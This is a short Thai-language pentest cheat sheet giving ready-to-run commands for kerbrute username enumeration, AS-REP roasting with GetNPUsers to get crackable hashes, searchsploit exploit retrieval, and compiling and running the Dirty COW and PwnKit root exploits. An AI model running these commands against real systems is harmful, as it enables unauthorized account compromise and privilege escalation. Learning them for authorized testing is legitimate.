คืออะไร: ใช้ enumerate username และ brute-force password ผ่าน Kerberos protocol (AD Domain)
ใช้เพื่อ: หาว่าชื่อผู้ใช้ใดบ้างที่มีอยู่ใน AD domain
คำสั่งพื้นฐาน:
./kerbrute userenum -d domain.local --dc 192.168.1.10 users.txt
อธิบายคำสั่ง:
-d = ระบุชื่อ domain
--dc = IP ของ Domain Controller
users.txt = ไฟล์ที่มีรายชื่อ usernames
คืออะไร: ใช้ดึง hash (AS-REP) ของผู้ใช้ที่มี property Do not require Kerberos preauth
คำสั่งพื้นฐาน:
python3 getnpusers.py domain.local/ -no-pass -usersfile users.txt -dc-ip 192.168.1.10 -format hashcat
ผลลัพธ์: ได้ hash ที่สามารถใช้กับ hashcat หรือ John the Ripper เพื่อ crack password
ผลลัพธ์: ได้ hash ที่สามารถใช้กับ hashcat หรือ John the Ripper เพื่อ crack password
คืออะไร: ใช้ค้นหา Exploit จาก Exploit Database ที่ติดตั้งใน Kali Linux
คำสั่งพื้นฐาน:
searchsploit windows smb
เพื่อคัดลอก exploit ไปใช้จริง:
searchsploit -m exploits/windows/remote/12345.py
อธิบาย: คำสั่งนี้จะคัดลอกไฟล์ exploit มาที่ working directory
คืออะไร: โค้ด Exploit ที่ใช้เจาะระบบ Linux ที่มีช่องโหว่ privilege escalation (Dirty COW)
ขั้นตอน:
ใช้คำสั่ง gcc คอมไพล์เป็น binary
gcc dirty.c -o dirty -pthread
./dirty
ผลลัพธ์: shell จะถูกยกระดับเป็น root
คืออะไร: ใช้ Exploit ช่องโหว่ Polkit ใน Linux เพื่อยกระดับสิทธิ์ (CVE-2021-4034)
ใช้งาน:
ใช้คำสั่ง gcc คอมไพล์เป็น binary
gcc Pwnkit.c -o pwnkit
./pwnkit